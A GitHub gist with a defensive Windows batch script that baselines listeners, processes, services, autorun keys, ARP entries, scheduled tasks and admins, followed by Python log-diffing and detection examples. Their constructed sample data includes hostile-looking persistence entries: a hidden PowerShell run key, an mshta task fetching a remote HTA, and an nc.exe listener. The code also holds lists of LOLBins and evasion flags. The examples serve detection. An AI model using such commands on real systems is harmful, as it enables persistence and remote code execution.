@blacklabssecurity
Last active September 7, 2018 17:29
Windows Batch used to create system baselines
@ECHO OFF
@REM Logic used to create system baselines and output to log files
@REM Requires elevated privileges
@SETLOCAL ENABLEDELAYEDEXPANSION
@REM Use WMIC to retrieve the date (its output does not depend on the regional date format, unlike %DATE%)
@REM Caveat: WMIC is deprecated and no longer installed by default on recent Windows 11 builds; swap in another date source if the command is missing
@ECHO OFF
for /f %%x in ('wmic path win32_localtime get /format:list ^| findstr "="') do set %%x
set TODAY=%Month%-%Day%-%Year%
@REM Creation of directory to store log files
mkdir "c:\windows\system32\systemBaseline" > nul 2> nul
SET LOGDIR=C:\windows\system32\systemBaseline
@REM # Custom Welcome Banner
cls
@echo on
@echo *****************************************************************
@echo * ____ __ ___ ___ *
@echo * / __/_ _____ / /____ __ _ / _ )___ ____ ___ / (_)__ ___ *
@echo * _\ \/ // (_-/ __ / -_) ' \ / _ / _ \`(_-/ -_) / / _ \/ -_)*
@echo * /___/\_, /___/\__/\__/_/_/_/ /____/\_,_/___/\__/_/_/_//_/\__/ *
@echo * /___/ *
@echo * *
@echo *****************************************************************
@ECHO.
@ECHO.
@echo ========= System Baseline Creation for System Monitoring ========
@ECHO OFF
@REM ####################################################
@ECHO OFF
pause
goto PortListeners
:PortListeners
@ECHO OFF
@REM ####################################################
@ECHO.
@echo ===================================
@echo Searching for ports listeners...
@echo ===================================
@ECHO OFF
@echo ############################################################ > %LOGDIR%/portListeners_%TODAY%.log
@echo ############ netstat Analysis for port listeners ########### >> %LOGDIR%/portListeners_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/portListeners_%TODAY%.log
netstat -naob >> %LOGDIR%/portListeners_%TODAY%.log
@REM -n shows addresses and ports numerically; -a shows all connections and listening ports (TCP and UDP).
@REM -o adds the owning Process ID for each socket.
@REM -b adds the executable (and, for services, the component) that owns each socket; requires elevated privileges.
@echo on
@echo It is important to know which ports are normally open on your system so that a rogue listener stands out.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'portListeners_%TODAY%'.
@ECHO.
@echo Compare each run against the previous baseline: new listening ports, and known ports now owned by a different executable, both deserve a look.
@REM ####################################################
@ECHO OFF
pause
goto Processes
:Processes
@ECHO OFF
@REM ####################################################
@ECHO.
@echo ===================================
@echo System Processes:
@echo ===================================
@ECHO.
@echo Let's create a baseline at boot to determine our 'normal' processes.
@ECHO.
@echo ########################################################### > %LOGDIR%/processes_%TODAY%.log
@echo ############ tasklist View of Running Processes ########### >> %LOGDIR%/processes_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/processes_%TODAY%.log
@echo Querying for all system processes now...
tasklist /v >> %LOGDIR%/processes_%TODAY%.log
@ECHO.
@echo All current running processes are recorded to a .log file in the %LOGDIR% dir with a name of 'processes_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system over time to determine if rogue processes have been executed.
@ECHO.
@echo You can further investigate any identified process with the 'wmic process list full' command.
@ECHO.
@echo Such information includes the command line the process was started with and its ParentProcessId.
@REM ####################################################
@ECHO OFF
pause
goto Services
:Services
@ECHO.
@REM ####################################################
@ECHO.
@echo ===================================
@echo System Services:
@echo ===================================
@ECHO.
@echo Let's create a baseline at boot to determine our 'normal' services.
@ECHO.
@echo ########################################################### > %LOGDIR%/servicesStarted_%TODAY%.log
@echo ############## System View of Started Services ############ >> %LOGDIR%/servicesStarted_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/servicesStarted_%TODAY%.log
@echo Querying for running services now...
@REM sc query lists only services whose state is active (running); 'sc query state= all' would include stopped ones
sc query >> %LOGDIR%/servicesStarted_%TODAY%.log
@ECHO.
@echo The output lists the services currently running on the system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'servicesStarted_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system over time to determine if rogue services have been started.
@REM #####################
@ECHO.
@echo ############################################################ > %LOGDIR%/service2Processes_%TODAY%.log
@echo ############# tasklist View of Started Services ############ >> %LOGDIR%/service2Processes_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/service2Processes_%TODAY%.log
@echo Mapping System Services to Process now...
tasklist /svc >> %LOGDIR%/service2Processes_%TODAY%.log
@ECHO.
@echo The output shows which process hosts each service; many services share a svchost.exe instance, so a service in an unexpected host process is worth a look.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'service2Processes_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system over time to determine if rogue services have been started or re-homed into a different process.
@REM ####################################################
@ECHO OFF
pause
goto UnusualFiles
:UnusualFiles
@ECHO.
@REM ####################################################
@ECHO.
@echo ================================
@echo Identify LARGE System Files:
@echo ================================
@ECHO.
@echo Let's search the system to identify any 'LARGE' files (modify the size threshold as appropriate).
@ECHO.
@echo ############################################################ > %LOGDIR%/10MB+Files_%TODAY%.log
@echo #################### LARGE System Files #################### >> %LOGDIR%/10MB+Files_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/10MB+Files_%TODAY%.log
@echo Querying for LARGE files now (this walks the whole C: drive and can take several minutes)...
@REM forfiles runs synchronously, so no wait loop is needed. The original RUNNING/WAITLOOP branch
@REM re-ran the scan every time forfiles returned 0, i.e. it never terminated.
@REM Caveat: cmd's IF does numeric comparison only for values that fit a signed 32-bit integer,
@REM so sizes above 2 GB are not compared reliably; treat such hits with care.
@REM 2> nul hides the access-denied errors forfiles emits for protected directories.
forfiles /S /P c:\ /M * /C "cmd /c if @fsize GEQ 10000000 echo @path - [ @fsize ]" >> %LOGDIR%/10MB+Files_%TODAY%.log 2> nul
@REM Alternative without forfiles: FOR /R C:\ %%I in (*) do @if %%~zI gtr 10000000 echo %%I %%~zI >> %LOGDIR%/10MB+Files_%TODAY%.log
@ECHO.
@echo Unexpected large files (10MB+) can be staged data awaiting exfiltration, archives, password lists or tools that do not belong on the system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of '10MB+Files_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system over time to determine if large files appear.
@REM ####################################################
@ECHO OFF
pause
goto RegistryCheck
:RegistryCheck
@ECHO.
@REM ####################################################
@ECHO.
@echo ===================================
@echo AutoRun Registry Settings:
@echo ===================================
@ECHO.
@echo Let's create a baseline of AutoRun entries in the 'HKLM' and 'HKCU' registry keys.
@ECHO.
@echo ############################################################ > %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ################### HKLM Registry Entries ################## >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo Querying the Local Machine (HKLM) registry entries now...
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( Run ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnce ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@REM stdout must go to the log; only stderr (key not found) is discarded
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnceEx ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( END )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ################### HKCU Registry Entries ################## >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo Querying the Current User registry entries now...
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( Run ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnce ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnceEx ENTRIES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( END )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo The Run, RunOnce and RunOnceEx keys above are the classic autostart locations for system boot and user logon.
@ECHO.
@echo On 64-bit Windows also check the Wow6432Node equivalents; services, scheduled tasks and the Winlogon and Explorer shell keys are further persistence points outside this baseline.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'registryAutoRun_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system over time to determine if rogue entries have been added to the registry.
@REM ####################################################
@ECHO OFF
pause
goto ARPEntries
:ARPEntries
@ECHO.
@REM ####################################################
@ECHO.
@echo =======================================
@echo Searching for all ARP associations...
@echo =======================================
@ECHO.
@echo Let's baseline the ARP entries on the system.
@ECHO.
@echo ########################################################## > %LOGDIR%/arpAssociations_%TODAY%.log
@echo ##################### ARP Associations ################### >> %LOGDIR%/arpAssociations_%TODAY%.log
@echo ########################################################## >> %LOGDIR%/arpAssociations_%TODAY%.log
@echo Querying the ARP cache now...
arp -a >> %LOGDIR%/arpAssociations_%TODAY%.log
@ECHO.
@echo It is important to know your IP to MAC address associations in order to identify unusual mappings.
@ECHO.
@echo Dynamic entries change as hosts and DHCP leases come and go, but the gateway's MAC should stay stable. A baseline helps detect ARP spoofing, the usual LAN MITM technique.
@ECHO.
@echo A static ARP entry for the default gateway (e.g. 'netsh interface ipv4 add neighbors', pushed via a GPO startup script) blunts such attempts.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'arpAssociations_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye out for unusual mappings of known layer 3 addresses.
@REM ####################################################
@ECHO OFF
pause
goto ScheduledTasks
:ScheduledTasks
@ECHO OFF
@REM ####################################################
@ECHO.
@echo =====================================
@echo Searching for Scheduled Tasks...
@echo =====================================
@ECHO.
@echo ############################################################ > %LOGDIR%/scheduledTasks_%TODAY%.log
@echo ################## System Scheduled Tasks ################## >> %LOGDIR%/scheduledTasks_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/scheduledTasks_%TODAY%.log
@REM /v adds Task To Run, Run As User, Author and Last Run Time: the fields that reveal an attacker's task
schtasks /query /fo LIST /v >> %LOGDIR%/scheduledTasks_%TODAY%.log
@ECHO.
@echo It is important to baseline the system's scheduled tasks to identify rogue tasks added to your system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'scheduledTasks_%TODAY%'.
@ECHO.
@echo You can delete tasks through command with elevated privileges: schtasks /delete /tn TaskNameToDelete
@REM ####################################################
@ECHO OFF
pause
goto Accounts
:Accounts
@ECHO.
@REM ####################################################
@ECHO.
@echo ########################################################### > %LOGDIR%/adminGroup_%TODAY%.log
@echo ############### Administrator Group Members ############### >> %LOGDIR%/adminGroup_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/adminGroup_%TODAY%.log
net localgroup administrators >> %LOGDIR%/adminGroup_%TODAY%.log
@ECHO.
@echo It is important to baseline the admin accounts on the system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'adminGroup_%TODAY%'.
@ECHO.
@echo Details of the user accounts can be viewed through the Local Users and Groups console (not available on Home editions). Launching now...
start lusrmgr.msc
@REM ####################################################
@ECHO.
pause
goto LogEntries
:LogEntries
@ECHO.
@REM ####################################################
@ECHO.
@echo Be sure to regularly review the Event Viewer (eventvwr.msc) as well, in particular failed logons (Security event 4625) and logons at unusual times or with unusual logon types (event 4624).
@echo Launching the Local Security Policy console so you can confirm that logon auditing is enabled; without it those events are never written.
start secpol.msc
@ECHO OFF
@echo ===================================
@echo System Baseline has been created.
@echo ===================================
@ECHO OFF
@echo All log outputs have been recorded in the %LOGDIR% directory.
start "" "c:\windows\system32\systemBaseline\"
@REM ####################################################
@ECHO.
pause
goto end
:end
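The script above only collects; the port-listener section tells you to compare runs by eye. The following Python is an added example, not part of the gist, that parses two of the portListeners_*.log files the script writes and reports listening sockets that are new or that are now owned by a different executable. The two sample logs are constructed in the script's own layout (banner lines followed by netstat -naob output); the file names, the Listener type and the function names are my own.

```python
"""Added example: diff two portListeners_*.log files written by the batch script above
and report listening sockets that are new, or whose owning executable changed.
Not part of the original gist; the sample logs below are constructed."""
import re
import sys
from typing import Dict, Iterable, List, NamedTuple, Optional, Tuple


class Listener(NamedTuple):
    proto: str   # TCP or UDP
    addr: str    # local bind address, e.g. 0.0.0.0, 127.0.0.1 or [::]
    port: int
    pid: int
    image: str   # executable reported by -b, or "unknown" when netstat could not obtain it


# One netstat row: proto, local addr:port, foreign addr, optional state (TCP only), PID
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")
_IMAGE = re.compile(r"^\s*\[(.+?)\]\s*$")   # " [svchost.exe]" line that -b prints under a row


def parse_netstat(text: str) -> List[Listener]:
    """Return the listening sockets in netstat -naob output: TCP rows in LISTENING state and
    every bound UDP row. Banner lines, service/component names and ESTABLISHED rows are skipped."""
    found: List[Listener] = []
    pending: Optional[Tuple[str, str, int, int, bool]] = None   # row waiting for its [image] line

    def flush(image: str) -> None:
        nonlocal pending
        if pending is not None and pending[4]:
            found.append(Listener(*pending[:4], image))
        pending = None

    for line in text.splitlines():
        row = _ROW.match(line)
        if row:
            flush("unknown")   # previous row ended without an [image] line (e.g. PID 4 / System)
            proto, addr, port, _foreign, state, pid = row.groups()
            pending = (proto, addr, int(port), int(pid), proto == "UDP" or state == "LISTENING")
            continue
        img = _IMAGE.match(line)
        if img and pending is not None:
            flush(img.group(1))
    flush("unknown")
    return found


def diff_listeners(baseline: Iterable[Listener], current: Iterable[Listener]) -> Dict[str, list]:
    """New sockets, plus sockets whose owner image changed on the same proto/addr/port
    (a service binary replaced, or a port taken over by another program).
    PIDs are deliberately ignored: they change on every reboot."""
    key = lambda l: (l.proto, l.addr, l.port)
    base = {key(l): l for l in baseline}
    new: List[Listener] = []
    changed: List[Tuple[Listener, Listener]] = []
    for l in current:
        old = base.get(key(l))
        if old is None:
            new.append(l)
        elif old.image.lower() != l.image.lower():
            changed.append((old, l))
    return {"new": new, "image_changed": changed}


def report(baseline_text: str, current_text: str) -> List[str]:
    d = diff_listeners(parse_netstat(baseline_text), parse_netstat(current_text))
    lines = [f"NEW      {l.proto} {l.addr}:{l.port} pid={l.pid} [{l.image}]" for l in d["new"]]
    lines += [f"CHANGED  {n.proto} {n.addr}:{n.port} [{o.image}] -> [{n.image}] pid={n.pid}"
              for o, n in d["image_changed"]]
    return lines


# Constructed sample logs in the layout the script produces (its banner, then netstat -naob).
BASELINE_LOG = """\
############################################################
############ netstat Analysis for port listeners ###########
############################################################

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
 Can not obtain ownership information
  TCP    127.0.0.1:5000         0.0.0.0:0              LISTENING       5032
 [python.exe]
  TCP    192.168.1.20:49700     93.184.216.34:443      ESTABLISHED     2200
 [chrome.exe]
  UDP    0.0.0.0:5353           *:*                                    1776
 [chrome.exe]
"""
CURRENT_LOG = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
 Can not obtain ownership information
  TCP    127.0.0.1:5000         0.0.0.0:0              LISTENING       6120
 [updater.exe]
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7316
 [nc.exe]
  UDP    0.0.0.0:5353           *:*                                    1800
 [chrome.exe]
"""

if __name__ == "__main__":
    # usage: python diff_listeners.py portListeners_<old>.log portListeners_<new>.log
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as a, open(sys.argv[2]) as b:
            baseline_text, current_text = a.read(), b.read()
    else:
        baseline_text, current_text = BASELINE_LOG, CURRENT_LOG
    print("\n".join(report(baseline_text, current_text)) or "no changes")
```

Against the constructed samples this reports one NEW listener (TCP 0.0.0.0:4444) and one CHANGED owner (127.0.0.1:5000 moved from python.exe to updater.exe); the PID change on port 135 is ignored on purpose. The same pattern (parse, key on the stable fields, diff) works for the script's other logs, such as tasklist /svc or net localgroup output.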
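The AutoRun registry section and the scheduled tasks section both collect commands that run without anyone typing them, and both leave the judgement of what looks wrong to the reader. The following Python is an added example, not part of the gist, that applies one set of heuristics to both sources: it parses the reg query output the script writes to registryAutoRun_*.log and the CSV form of the task list (it assumes you collect tasks with schtasks /query /fo CSV /v, which the script does not do), then flags commands that reference user-writable directories, launch a script host or other living-off-the-land binary, or carry hidden/encoded/bypass flags. The directory and binary lists are my assumptions, the sample data is constructed, and the CSV is trimmed to the four columns the code reads.

```python
"""Added example: flag autostart commands from registryAutoRun_*.log (reg query output) and from
`schtasks /query /fo CSV /v` whose command line points into user-writable directories, launches a
script host / LOLBin, or carries hidden/encoded/bypass flags. Not part of the original gist;
the heuristics and samples are assumptions for illustration."""
import csv
import io
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    source: str        # registry key, or "schtasks"
    name: str          # value name or task name
    command: str
    reasons: List[str]


# Assumed heuristics; tune to your environment (some legitimate updaters do live in AppData).
WRITABLE_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
HIDING_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "bypass")


def executable_of(command: str) -> str:
    """First token of a command line, honouring a quoted path that contains spaces."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def suspicious_reasons(command: str) -> List[str]:
    low = command.lower()
    base = executable_of(command).lower().replace("/", "\\").rsplit("\\", 1)[-1]
    if base and "." not in base:     # "powershell -enc ..." written without the extension
        base += ".exe"
    reasons: List[str] = []
    if any(d in low for d in WRITABLE_DIRS):
        reasons.append("references a user-writable directory")
    if base in SCRIPT_HOSTS:
        reasons.append("launches script/LOLBin host " + base)
    if any(f in low for f in HIDING_FLAGS):
        reasons.append("hidden/encoded/bypass flags")
    return reasons


_VALUE = re.compile(r"^ {4}(.+?) {4}(REG_[A-Z_]+) {4}(.*)$")   # reg query prints 4-space columns


def parse_reg_query(text: str) -> Dict[str, Dict[str, str]]:
    """{key path: {value name: data}} for the string values in reg query output.
    The script's banner lines start with neither HKEY_ nor four spaces and are ignored."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys.setdefault(current, {})
        elif current is not None:
            m = _VALUE.match(line)
            if m and m.group(2) in ("REG_SZ", "REG_EXPAND_SZ"):
                keys[current][m.group(1)] = m.group(3)
    return keys


def parse_schtasks_csv(text: str) -> List[Dict[str, str]]:
    """Rows of `schtasks /query /fo CSV /v`; schtasks repeats the header row, so drop any such rows."""
    return [r for r in csv.DictReader(io.StringIO(text)) if r.get("TaskName") != "TaskName"]


def scan(reg_text: str, tasks_csv: str) -> List[Finding]:
    findings: List[Finding] = []
    for key, values in parse_reg_query(reg_text).items():
        for name, cmd in values.items():
            reasons = suspicious_reasons(cmd)
            if reasons:
                findings.append(Finding(key, name, cmd, reasons))
    for row in parse_schtasks_csv(tasks_csv):
        cmd = row.get("Task To Run", "")
        reasons = suspicious_reasons(cmd)
        if reasons:
            findings.append(Finding("schtasks", row.get("TaskName", "?"), cmd, reasons))
    return findings


# Constructed samples: a registryAutoRun log fragment, and a schtasks CSV trimmed to four columns.
REG_LOG = r'''
------------------------------------------------------------
----------((((( Run ENTRIES )))))----------
------------------------------------------------------------

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    powershell.exe -w hidden -ep bypass -f C:\Users\alice\AppData\Roaming\up.ps1
'''.strip()
TASKS_CSV = r'''
"HostName","TaskName","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o","SYSTEM"
"WS01","\Office Telemetry","""C:\Program Files\Microsoft Office\root\Office16\msoia.exe"" scan upload","alice"
"WS01","\SystemUpdate","C:\Users\alice\AppData\Local\Temp\svchost.exe","alice"
"WS01","\Maintenance","mshta.exe http://203.0.113.5/m.hta","SYSTEM"
'''.strip()

if __name__ == "__main__":
    for f in scan(REG_LOG, TASKS_CSV):
        print(f"{f.source}\n  {f.name}: {f.command}\n  -> {'; '.join(f.reasons)}")
```

On the constructed data this flags four of the seven entries: OneDrive (AppData, a known benign hit that shows why these heuristics belong next to the baseline diff rather than replacing it), the powershell "Updater" on all three counts, a svchost.exe copy in Temp, and an mshta task fetching from a remote host.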
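The ARP section says a baseline helps spot MITM attempts but leaves the check itself to the reader. The following Python is an added example, not part of the gist, that parses two arpAssociations_*.log files (arp -a output) and raises the two classic ARP-spoofing indicators: the gateway's MAC differs from the baseline, and a single MAC is answering for several IPs. The gateway address is supplied by the caller (an assumption; read it from ipconfig or route print), and the sample tables are constructed.

```python
"""Added example: compare two arpAssociations_*.log files (arp -a output) and flag ARP-spoofing
indicators: the gateway MAC changed since the baseline, or one MAC answering for several IPs.
Not part of the original gist; samples are constructed."""
import re
import sys
from typing import Dict, List, Tuple

# "  192.168.1.1           00-11-22-33-44-55     dynamic"  (IPv4 rows only)
_ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$", re.I)

ArpTable = Dict[str, Tuple[str, str]]   # ip -> (mac, "dynamic" | "static")


def parse_arp(text: str) -> ArpTable:
    """Entries across all interfaces in `arp -a` output; banner and header lines do not match."""
    table: ArpTable = {}
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if m:
            table[m.group(1)] = (m.group(2).lower(), m.group(3).lower())
    return table


def arp_alerts(baseline: ArpTable, current: ArpTable, gateway: str) -> List[str]:
    """Gateway MAC drift against the baseline, and duplicate MACs among dynamic entries.
    Static rows (broadcast, multicast, pinned entries) are excluded from the duplicate check."""
    alerts: List[str] = []
    old_gw, new_gw = baseline.get(gateway), current.get(gateway)
    if old_gw and new_gw and old_gw[0] != new_gw[0]:
        alerts.append(f"gateway {gateway} MAC changed {old_gw[0]} -> {new_gw[0]}")
    by_mac: Dict[str, List[str]] = {}
    for ip, (mac, kind) in current.items():
        if kind == "dynamic":
            by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for {', '.join(sorted(ips))}")
    return alerts


# Constructed samples in arp -a layout; in the second one an attacker at 192.168.1.30 has
# poisoned the cache so that its MAC is now returned for the gateway as well.
BASELINE_ARP = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.30          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
"""
CURRENT_ARP = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.30          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.40          11-22-33-44-55-66     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

if __name__ == "__main__":
    # usage: python arp_check.py <gateway-ip> arpAssociations_<old>.log arpAssociations_<new>.log
    if len(sys.argv) == 4:
        gateway = sys.argv[1]
        with open(sys.argv[2]) as a, open(sys.argv[3]) as b:
            baseline, current = parse_arp(a.read()), parse_arp(b.read())
    else:
        gateway, baseline, current = "192.168.1.1", parse_arp(BASELINE_ARP), parse_arp(CURRENT_ARP)
    print("\n".join(arp_alerts(baseline, current, gateway)) or "no ARP anomalies")
```

Both indicators are heuristics: a replaced router legitimately changes the gateway MAC once, and a device that holds several addresses (a router with virtual IPs, a VRRP pair) legitimately shows one MAC for more than one IP, so investigate rather than act on an alert alone. A new host such as 192.168.1.40 appearing is ordinary churn and is not reported.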